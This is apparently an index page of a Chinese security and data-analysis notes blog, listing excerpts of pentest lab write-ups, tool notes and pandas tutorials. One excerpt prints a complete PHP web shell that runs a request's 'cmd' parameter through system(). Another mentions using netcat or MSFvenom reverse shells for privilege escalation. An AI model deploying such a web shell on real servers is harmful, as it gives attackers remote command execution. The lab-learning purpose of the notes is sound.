zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
文件查找 find命令-白鸢的笔记

文件查找 find命令

find命令find是实时查找工具,通过遍历指定路径完成文件查找工作特点:·查找速度略慢·精确查找·实时查找·查找条件丰富·可能只搜索用户具备读取和执行权限的目录格式:find [OPTION]... [查...
简单php木马-白鸢的笔记

简单php木马

simple-backdoor.php<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; } ?>使用方法:Usage: http://target...
11个月前
0676
Running as in Windows-白鸢的笔记

Running as in Windows

如果您以低权限用户的身份运行,并且拥有管理员凭证(用户名和密码),那么您可以使用这些凭证升级您的权限。最实际的方法是首先复制反向shell(例如,netcat或使用MSFvenom生成的shell)。之后...
Mango NoSql注入与爆破 jjs权限提升-白鸢的笔记

Mango NoSql注入与爆破 jjs权限提升

实验环境攻击者 Kali 10.10.16.5受害者 IP 10.10.10.162 Linux 1. 信息收集22,80,443端口开启root@kali# nmap -p 22,80,443 -sC -sV -oA scans/nmap-tcpscripts 10.10.10.162 Starting Nmap 7....
8个月前
0536
Droopescan-白鸢的笔记

Droopescan

Droopescan是一款基于插件的扫描器,可帮助安全研究人员发现Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用URL地址)和Moodle的问题。安装:使用pip安装会非常容易:apt-get i...
赋值和排序操作-白鸢的笔记

赋值和排序操作

准备数据import pandas as pd stock_data = pd.read_csv('/root/Documents/stock_data.csv') print(stock_data) 1. 赋值操作stock_data['volume'] = 100 print(stock_data)都变成了100或者使用...
CTF-200-06-白鸢的笔记

CTF-200-06

简介point 10CTF-200-06Difficulty INTERMEDIATErated by community INTERMEDIATE Part 6 of Labor Day CTF Machine 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.186.37   Linux...
Silo Oracle TNS Listener漏洞利用-白鸢的笔记

Silo Oracle TNS Listener漏洞利用

简介SiloDifficulty Medium 实验环境攻击者 Kali 10.10.16.18受害者 IP 10.10.10.82 Windows 1. 信息收集收集受害者服务详情使用nmap脚本判断是否有漏洞nmap -Pn -sT --script=oracle-tns-po...
11个月前
0676
Five86.2 tcpdump流量分析-白鸢的笔记

Five86.2 tcpdump流量分析

简介point 8Five86.2Difficulty Intermediaterated by community HARD Do you know your network flows? Only local.txt and proof.txt are valid flags. 实验环境攻击者 Kali 192.168.45.170...
DataFrame运算-白鸢的笔记

DataFrame运算

1. 算数运算准备数据import pandas as pdstock_data = pd.read_csv('/root/Documents/stock_data.csv')print(stock_data) 2. 算数运算加法close列全体加10print(stock_data['close'].add(10))...